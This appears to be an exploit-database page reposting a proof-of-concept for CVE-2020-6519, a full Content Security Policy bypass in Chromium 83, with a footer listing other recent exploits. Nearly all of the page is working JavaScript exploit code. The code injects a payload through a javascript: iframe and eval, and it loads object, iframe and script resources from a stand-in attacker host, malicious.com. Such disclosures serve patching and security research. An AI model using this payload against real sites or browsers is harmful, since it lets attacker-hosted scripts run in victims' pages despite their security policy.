Chromium 83 full csp bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-12-04 | Type : local | Platform : multiple
This exploit / vulnerability Chromium 83 full csp bypass is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

#Title: Chromium 83 - Full CSP Bypass
#Date: 02/09/2020
#Exploit Author: Gal Weizman
#Vendor Homepage: https://www.chromium.org/
#Software Link: https://download-chromium.appspot.com/
#Version: 83
#Tested On: Mac OS, Windows, iPhone, Android
#CVE: CVE-2020-6519

(function(){

var payload = `
top.SUCCESS = true;
var o = document.createElement("object");
o.data = \`http://malicious.com/bypass-object-src.html\`;
document.body.appendChild(o);
var i = document.createElement("iframe");
i.src = \`http://malicious.com/bypass-child-src.html\`;
document.body.appendChild(i);
var s = document.createElement("script");
s.src = \`http://malicious.com/bypass-script-src.js\`;
document.body.appendChild(s);
`;

document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>";
setTimeout(() => {
if (!top.SUCCESS) {
XXX.contentWindow.eval(payload);
}
});

}())

// further information: https://github.com/weizman/CVE-2020-6519

Chromium 83 full csp bypass


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Chromium 83 full csp bypass Vulnerability / Exploit